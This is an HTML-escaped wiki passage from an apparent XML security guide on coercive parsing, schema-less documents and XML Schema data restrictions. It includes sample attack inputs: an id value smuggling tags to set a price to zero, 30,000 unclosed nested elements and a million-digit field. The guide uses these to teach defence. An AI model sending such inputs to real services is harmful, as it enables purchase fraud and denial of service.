Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well formed is to open one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the restrictions that other schema languages can apply to XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1,000,000 digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;, as is the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The well-formed and valid XML document begins after this definition. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
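&lt;br /&gt;
As a minimal sketch of how another schema language could tighten these values, the following XML Schema fragment bounds both elements. The limits used here (a name of at most 256 characters and an age between 0 and 150 written with at most three digits) are assumptions chosen for illustration, not values taken from any particular application. The &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; facet is included because a numeric range alone would still accept a small number padded with an arbitrary amount of leading zeros:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;person&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
        &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;age&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:restriction base=&amp;quot;xs:nonNegativeInteger&amp;quot;&amp;gt;&lt;br /&gt;
        &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{1,3}&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:'''maxInclusive''' value=&amp;quot;150&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;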
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered the result valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema.&lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type avoids any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, an attacker who provides a negative number could produce a negative result on the user’s account. To avoid this logical vulnerability, the schema should use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
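Because &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; does not include &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, a price set to either of these values fails validation instead of triggering errors in the application. An attacker can exploit this issue only if those values are allowed.&lt;br /&gt;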
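&lt;br /&gt;
The &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; type still accepts negative numbers and any number of fractional digits. As a sketch only, assuming that prices must be non-negative and carry at most two decimal places (both assumptions made for this example), the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element could be restricted further:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;price&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:decimal&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minInclusive''' value=&amp;quot;0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''fractionDigits''' value=&amp;quot;2&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;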
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, there are only 12 months, and so on. The schema can enforce these restrictions for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML Schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed for an SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
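&lt;br /&gt;
The &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; facet belongs to XML Schema 1.1, so processors that support only XML Schema 1.0 are not expected to accept it. As a sketch of one possible alternative for those processors, a &amp;lt;tt&amp;gt;union&amp;lt;/tt&amp;gt; of the negative and positive integer types accepts every integer except zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:'''union''' memberTypes=&amp;quot;xs:negativeInteger xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;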
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Leaving the maximum number of occurrences undefined exposes the application to whatever happens when it receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
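&lt;br /&gt;
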